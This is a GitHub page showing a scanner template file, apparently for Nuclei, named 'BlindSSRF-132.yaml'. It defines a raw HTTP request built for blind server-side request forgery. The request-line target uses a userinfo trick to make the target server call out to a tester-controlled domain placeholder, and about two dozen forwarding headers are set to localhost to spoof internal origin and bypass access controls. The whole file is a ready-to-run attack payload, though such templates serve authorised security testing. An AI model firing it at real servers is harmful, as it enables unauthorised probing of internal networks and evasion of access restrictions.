-
Notifications
You must be signed in to change notification settings - Fork 21
/
BlindSSRF-132.yaml
45 lines (42 loc) · 1.18 KB
/
BlindSSRF-132.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
id: 0x132
info:
name: Blind SSRF
author: 0xAwali
severity: info
requests:
- raw:
- |+
GET :@{{Host}}.{{Port}}.BSSRF-132.{{MY-DOMAIN}}/ HTTP/1.1
X-Forwarded-For: localhost
X-Forwarded-Host: localhost
X-Forwarded: localhost
Forwarded-For: localhost
Forwarded: for=localhost;by=localhost;host=localhost
X-Remote-IP: localhost
X-Remote-Addr: localhost
True-Client-IP: localhost
Client-IP: localhost
X-Client-IP: localhost
X-Cluster-Client-IP: localhost
WL-Proxy-Client-IP: localhost
Proxy-Client-IP: localhost
Fastly-Client-Ip: localhost
True-Client-Ip: localhost
X-Real-IP: localhost
X-Originating-IP: localhost
Ali-CDN-Real-IP: localhost
Cdn-Src-Ip: localhost
Cdn-Real-Ip: localhost
CF-Connecting-IP: localhost
X-Host: localhost
X-Custom-IP-Authorization: localhost
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
unsafe: true
matchers:
- type: word
part: body
words:
- "Your Match"